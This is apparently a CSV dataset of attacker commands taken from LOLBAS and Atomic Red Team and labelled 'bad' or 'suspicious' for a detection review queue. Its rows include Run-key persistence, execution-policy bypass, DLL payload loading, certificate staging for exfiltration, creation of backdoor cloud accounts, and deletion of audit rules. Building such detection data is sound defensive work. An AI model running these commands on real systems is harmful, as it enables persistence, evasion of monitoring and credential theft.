calc.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml,Nvuhda6.exe,,"[""""]",,0.85,False,Execute calc.exe as a subprocess.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c1fce966366f2e4a4efb801a,"nvuhda6.exe Copy test.txt,test-2.txt","nvuhda6.exe Copy test.txt,test-2.txt",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml,Nvuhda6.exe,,"[""""]",,0.85,False,Copy fila A to file B.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5319ff1955e6ab219e6b0149,nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe,nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml,Nvuhda6.exe,,"[""""]",,0.85,False,Add/Edit a Registry key value,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f95a13cac625b0969b5ffa29,"nvuhda6.exe CreateShortcut test.lnk,""Test"",""C:\Windows\System32\calc.exe"","""",""C:\Windows\System32\""","nvuhda6.exe CreateShortcut test.lnk,""Test"",""C:\Windows\System32\calc.exe"","""",""C:\Windows\System32\""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml,Nvuhda6.exe,,"[""""]",,0.85,False,Create shortcut file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e2421d5f387116813a685a12,nvuhda6.exe KillApp calc.exe,nvuhda6.exe KillApp calc.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml,Nvuhda6.exe,,"[""""]",,0.85,False,Kill a process.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d5d005a6becb1d25e4f32939,nvuhda6.exe Run foo,nvuhda6.exe Run foo,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml,Nvuhda6.exe,,"[""""]",,0.85,False,Run process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4b2627dff0915de941799b4c,"""C:\Program Files\Avast Software\Avast\aswrundll"" ""C:\Users\Public\Libraries\tempsys\module.dll""","""C:\Program Files\Avast Software\Avast\aswrundll"" ""C:\Users\Public\Libraries\tempsys\module.dll""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/aswrundll.yml,aswrundll.exe,Execute,"[""""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Load and execute modules using aswrundll,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 72b977426261315e6d1162a9,"Notes.exe ""=N:\Lotus\Notes\Data\notes.ini"" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }","Notes.exe ""=N:\Lotus\Notes\Data\notes.ini"" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Notes.yml,Notes.exe,,"[""""]",,0.85,False,Run PowerShell via LotusNotes.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8ea237478f6936be40e4d6f1,"Usbinst.exe InstallHinfSection ""DefaultInstall 128 c:\temp\calc.inf""","Usbinst.exe InstallHinfSection ""DefaultInstall 128 c:\temp\calc.inf""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Usbinst.yml,Usbinst.exe,,"[""""]",,0.85,False,Execute calc.exe through DefaultInstall Section Directive in INF file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6a1f4e97ce4a41472df827b5,"NLNOTES.EXE /authenticate ""=N:\Lotus\Notes\Data\notes.ini"" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }","NLNOTES.EXE /authenticate ""=N:\Lotus\Notes\Data\notes.ini"" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nlnotes.yml,Nlnotes.exe,,"[""""]",,0.85,False,Run PowerShell via LotusNotes.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0ba56fc363469c49fb0e5656,Gpup.exe -w whatever -e c:\Windows\System32\calc.exe,Gpup.exe -w whatever -e c:\Windows\System32\calc.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Gpup.yml,Gpup.exe,,"[""""]",,0.85,False,Execute another command through gpup.exe (Notepad++ binary).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 265b96297520c3d331342ad3,cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out,cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml,testxlst.js,Execution,"[""T1064""]",Windows,0.85,False,Test Jscript included in Python tool to perform XSL transform (for payload execution).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 36025b1886dc9fffeb2d8a2c,wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out,wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml,testxlst.js,Execution,"[""T1064""]",Windows,0.85,False,Test Jscript included in Python tool to perform XSL transform (for payload execution).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c50f9f68983b7456f97d11c0,netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() netsh.exe trace show status,netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() netsh.exe trace show status,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Netsh.yml,Netsh.exe,,"[""""]",,0.85,False,Capture network traffic on remote file share.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0c0aa45f64932db83a6321b5,netsh.exe add helper C:\Path\file.dll,netsh.exe add helper C:\Path\file.dll,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Netsh.yml,Netsh.exe,,"[""""]",,0.85,False,Load (execute) NetSh.exe helper DLL file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 727f90fa71c50a73ff674e1a,netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Netsh.yml,Netsh.exe,,"[""""]",,0.85,False,Forward traffic from the listening address and proxy to a remote system.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 375a464c3cc563b72d265c85,OpenWith.exe /c C:\test.hta,OpenWith.exe /c C:\test.hta,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Openwith.yml,Openwith.exe,,"[""""]",,0.85,False,Opens the target file with the default application.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bd7e4bfdcf43e51530b56a87,OpenWith.exe /c C:\testing.msi,OpenWith.exe /c C:\testing.msi,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Openwith.yml,Openwith.exe,,"[""""]",,0.85,False,Opens the target file with the default application.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 665cfdb7bed7792810e858fe,nltest.exe /SERVER:192.168.1.10 /QUERY,nltest.exe /SERVER:192.168.1.10 /QUERY,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Nltest.yml,Nltest.exe,,"[""""]",,0.85,False,,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4040413aac1c28ff8ad6b7cf,powershell -ep bypass - < c:\temp:ttt,powershell -ep bypass - < c:\temp:ttt,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Powershell.yml,Powershell.exe,,"[""""]",,0.85,False,Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 10dd5387205c23242e0c767f,explorer.exe calc.exe,explorer.exe calc.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Explorer.yml,Explorer.exe,,"[""""]",,0.85,False,Executes calc.exe as a subprocess of explorer.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33b229f9c464a027f086c354,psr.exe /start /gui 0 /output c:\users\user\out.zip,psr.exe /start /gui 0 /output c:\users\user\out.zip,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Psr.yml,Psr.exe,,"[""""]",,0.85,False,Capture screenshots of the desktop and save them in the target .ZIP file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1bdef2c050e466d650b1ec1f,psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip,psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Psr.yml,Psr.exe,,"[""""]",,0.85,False,Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1e9d7139a330a487885d7cc3,psr.exe /stop,psr.exe /stop,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Psr.yml,Psr.exe,,"[""""]",,0.85,False,Stop the Problem Step Recorder.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 491740792108bd66704da98b,Robocopy.exe C:\SourceFolder C:\DestFolder,Robocopy.exe C:\SourceFolder C:\DestFolder,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Robocopy.yml,Robocopy.exe,,"[""""]",,0.85,False,Copy the entire contents of the SourceFolder to the DestFolder.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d53dff7cd97e3c2c09687170,Robocopy.exe \\SERVER\SourceFolder C:\DestFolder,Robocopy.exe \\SERVER\SourceFolder C:\DestFolder,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OSBinaries/Robocopy.yml,Robocopy.exe,,"[""""]",,0.85,False,Copy the entire contents of the SourceFolder to the DestFolder.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fb13f4a03f41e5e709f006cb,winword.exe /l dllfile.dll,winword.exe /l dllfile.dll,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml,winword.exe,Execute,"[""T1218""]",Windows,0.85,False,Launch DLL payload.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 36a7035d50f525f9fdcb3ab0,"$archive=""$env:PUBLIC\T1649\atomic_certs.zip"" $exfilpath=""$env:PUBLIC\T1649\certs"" Add-Type -assembly ""system.io.compression.filesystem"" Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore mkdir $exfilpath | Out-Null foreach ($cert in (gci Cert:\CurrentUser\My)) { Export-Certificate -Cert $cert -FilePath $exfilpath\$($cert.FriendlyName).cer} [io.compression.zipfile]::CreateFromDirectory($exfilpath, $archive)","$archive=""$env:PUBLIC\T1649\atomic_certs.zip"" $exfilpath=""$env:PUBLIC\T1649\certs"" Add-Type -assembly ""system.io.compression.filesystem"" Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore mkdir $exfilpath | Out-Null foreach ($cert in (gci Cert:\CurrentUser\My)) { Export-Certificate -Cert $cert -FilePath $exfilpath\$($cert.FriendlyName).cer} [io.compression.zipfile]::CreateFromDirectory($exfilpath, $archive)",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1649/T1649.yaml,Staging Local Certificates via Export-Certificate,T1649,"[""T1649""]",windows,0.9,False,"Export all user certificates and add to a compressed archive. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c82a370a3cfeca071a3cf9a5,"$exfilpath=""$env:PUBLIC\T1649\certs"" Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore","$exfilpath=""$env:PUBLIC\T1649\certs"" Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1649/T1649.yaml,Staging Local Certificates via Export-Certificate,T1649,"[""T1649""]",windows,0.55,True,"Export all user certificates and add to a compressed archive. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d7b85ef83d272e02d1fce2f8,Enable-PSRemoting -Force,Enable-PSRemoting -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.006/T1021.006.yaml,Enable Windows Remote Management,T1021.006,"[""T1021.006""]",windows,0.9,False,"Powershell Enable WinRM Upon successful execution, powershell will ""Enable-PSRemoting"" allowing for remote PS access. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4e5dfea12aea6810d8b72e66,Enable-PSRemoting -Force Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami},Enable-PSRemoting -Force Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.006/T1021.006.yaml,Remote Code Execution with PS Credentials Using Invoke-Command,T1021.006,"[""T1021.006""]",windows,0.9,False,"Simulate lateral movement with PowerShell Remoting on the local host. Upon successful execution, PowerShell will execute `whoami` using `Invoke-Command`, targeting the local machine as remote target. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e8616659a26fb91aa3754dfc,Disable-PSRemoting -Force,Disable-PSRemoting -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.006/T1021.006.yaml,Remote Code Execution with PS Credentials Using Invoke-Command,T1021.006,"[""T1021.006""]",windows,0.55,True,"Simulate lateral movement with PowerShell Remoting on the local host. Upon successful execution, PowerShell will execute `whoami` using `Invoke-Command`, targeting the local machine as remote target. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a8aadccef37c493405ae5c1d,evil-winrm -i #{destination_address} -u #{user_name} -p #{password},evil-winrm -i #{destination_address} -u #{user_name} -p #{password},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.006/T1021.006.yaml,WinRM Access with Evil-WinRM,T1021.006,"[""T1021.006""]",windows,0.9,False,An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 43653a1e00e8b4869a03e5c5,aws iam create-user --user-name #{username},aws iam create-user --user-name #{username},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1136.003/T1136.003.yaml,AWS - Create a new IAM user,T1136.003,"[""T1136.003""]",iaas:aws,0.9,False,"Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ba0981134d2a189f242e5c63,aws iam delete-user --user-name #{username},aws iam delete-user --user-name #{username},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1136.003/T1136.003.yaml,AWS - Create a new IAM user,T1136.003,"[""T1136.003""]",iaas:aws,0.55,True,"Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a72ec7eed6f5d197d323f477,"Connect-AzureAD $userprincipalname = ""#{userprincipalname}"" $username = ""#{username}"" $password = ""#{password}"" $PasswordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile $PasswordProfile.Password = $password New-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName $username","Connect-AzureAD $userprincipalname = ""#{userprincipalname}"" $username = ""#{username}"" $password = ""#{password}"" $PasswordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile $PasswordProfile.Password = $password New-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName $username",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1136.003/T1136.003.yaml,Azure AD - Create a new user,T1136.003,"[""T1136.003""]",azure-ad,0.9,False,"Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f393dec7fe0c53c6f5ada96c,"Remove-AzureADUser -ObjectId ""#{userprincipalname}""","Remove-AzureADUser -ObjectId ""#{userprincipalname}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1136.003/T1136.003.yaml,Azure AD - Create a new user,T1136.003,"[""T1136.003""]",azure-ad,0.55,True,"Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9180dd5b7ae9195702eedcfe,"az login $userprincipalname = ""#{userprincipalname}"" $username = ""#{username}"" $password = ""#{password}"" az ad user create --display-name $username --password $password --user-principal-name $userprincipalname az ad user list --filter ""displayname eq 'atomicredteam'""","az login $userprincipalname = ""#{userprincipalname}"" $username = ""#{username}"" $password = ""#{password}"" az ad user create --display-name $username --password $password --user-principal-name $userprincipalname az ad user list --filter ""displayname eq 'atomicredteam'""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1136.003/T1136.003.yaml,Azure AD - Create a new user via Azure CLI,T1136.003,"[""T1136.003""]",azure-ad,0.9,False,"Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 718353bf9245864cc95c9d44,"az ad user delete --id ""#{userprincipalname}""","az ad user delete --id ""#{userprincipalname}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1136.003/T1136.003.yaml,Azure AD - Create a new user via Azure CLI,T1136.003,"[""T1136.003""]",azure-ad,0.55,True,"Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7ab75b9a168aef83b9210ebc,"& ""PathToAtomicsFolder\T1090.003\src\Psiphon.bat""","& ""PathToAtomicsFolder\T1090.003\src\Psiphon.bat""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1090.003/T1090.003.yaml,Psiphon,T1090.003,"[""T1090.003""]",windows,0.9,False,"Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you with uncensored access to Internet. This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands. More information can be found about Psiphon using the following urls http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html https://psiphon.ca/faq.html ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 22c156b23be6a9613094c747,"$Proxy = Get-Content $env:Temp\proxy-backup.txt -ErrorAction Ignore if($null -ne $Proxy) {Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name ""ProxyServer"" -Value $Proxy}","$Proxy = Get-Content $env:Temp\proxy-backup.txt -ErrorAction Ignore if($null -ne $Proxy) {Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name ""ProxyServer"" -Value $Proxy}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1090.003/T1090.003.yaml,Psiphon,T1090.003,"[""T1090.003""]",windows,0.55,True,"Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you with uncensored access to Internet. This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands. More information can be found about Psiphon using the following urls http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html https://psiphon.ca/faq.html ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8f6ea4f6d1c374635cab726f,"invoke-expression 'cmd /c start powershell -Command {cmd /c ""#{TorExe}""}' sleep -s 60 stop-process -name ""tor"" | out-null","invoke-expression 'cmd /c start powershell -Command {cmd /c ""#{TorExe}""}' sleep -s 60 stop-process -name ""tor"" | out-null",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1090.003/T1090.003.yaml,Tor Proxy Usage - Windows,T1090.003,"[""T1090.003""]",windows,0.9,False,"This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d39094653b4ae5202c1e2f98,"[ ""$(uname)"" = 'FreeBSD' ] && sysrc tor_enable=""YES"" && service tor start || sudo systemctl start tor","[ ""$(uname)"" = 'FreeBSD' ] && sysrc tor_enable=""YES"" && service tor start || sudo systemctl start tor",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1090.003/T1090.003.yaml,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,T1090.003,"[""T1090.003""]",linux,0.9,False,"This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1e67a7d5cb67b97f7dbbb8c2,"[ ""$(uname)"" = 'FreeBSD' ] && service tor stop && sysrc -x tor_enable || sudo systemctl stop tor","[ ""$(uname)"" = 'FreeBSD' ] && service tor stop && sysrc -x tor_enable || sudo systemctl stop tor",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1090.003/T1090.003.yaml,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,T1090.003,"[""T1090.003""]",linux,0.55,True,"This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4c74a676b3c1bc4c3a0bbb02,"osascript -e 'tell application ""Terminal"" to do script ""tor""'","osascript -e 'tell application ""Terminal"" to do script ""tor""'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1090.003/T1090.003.yaml,Tor Proxy Usage - MacOS,T1090.003,"[""T1090.003""]",macos,0.9,False,"This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0cc158fdb213f3b947fba683,killall tor > /dev/null 2>&1,killall tor > /dev/null 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1090.003/T1090.003.yaml,Tor Proxy Usage - MacOS,T1090.003,"[""T1090.003""]",macos,0.55,True,"This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c2b0bb1ab21075cf17ab2613,auditctl -D,auditctl -D,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.012/T1562.012.yaml,Delete all auditd rules using auditctl,T1562.012,"[""T1562.012""]",linux,0.9,False,"Using 'auditctl -D' deletes all existing audit rules, resulting in the loss of previously configured monitoring settings and the audit trail. This action reduces visibility into system activities, potentially leading to compliance concerns and hampering security monitoring efforts. Additionally, it poses a risk of covering unauthorized activities by erasing evidence from audit logs. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9ee6c2e92d33c47a4ccf1db8,service auditd restart,service auditd restart,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.012/T1562.012.yaml,Delete all auditd rules using auditctl,T1562.012,"[""T1562.012""]",linux,0.55,True,"Using 'auditctl -D' deletes all existing audit rules, resulting in the loss of previously configured monitoring settings and the audit trail. This action reduces visibility into system activities, potentially leading to compliance concerns and hampering security monitoring efforts. Additionally, it poses a risk of covering unauthorized activities by erasing evidence from audit logs. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c62d13fee671f265462196de,auditctl -e 0,auditctl -e 0,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.012/T1562.012.yaml,Disable auditd using auditctl,T1562.012,"[""T1562.012""]",linux,0.9,False,"The command `auditctl -e 0` disables the audit system. By setting the parameter to `0`, auditing is deactivated, halting the monitoring and recording of security-related events. This action stops the generation of audit logs, ceasing the collection of data regarding system activities. Disabling auditing may be done for various reasons, such as troubleshooting, performance optimization, or temporarily suspending auditing requirements, but it reduces visibility into system events and can impact se",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b2fc6501f3fac6fa76a117d6,auditctl -e 1,auditctl -e 1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.012/T1562.012.yaml,Disable auditd using auditctl,T1562.012,"[""T1562.012""]",linux,0.55,True,"The command `auditctl -e 0` disables the audit system. By setting the parameter to `0`, auditing is deactivated, halting the monitoring and recording of security-related events. This action stops the generation of audit logs, ceasing the collection of data regarding system activities. Disabling auditing may be done for various reasons, such as troubleshooting, performance optimization, or temporarily suspending auditing requirements, but it reduces visibility into system events and can impact se",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 62888c6d61425b4a0c74c879,"New-Item -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -ItemType Directory -ErrorAction Ignore Get-ChildItem -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data"" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -Recurse -Force -ErrorAction Ignore } Remove-Item -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -Recurse -Force -ErrorAction Ignore","New-Item -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -ItemType Directory -ErrorAction Ignore Get-ChildItem -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data"" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -Recurse -Force -ErrorAction Ignore } Remove-Item -Path 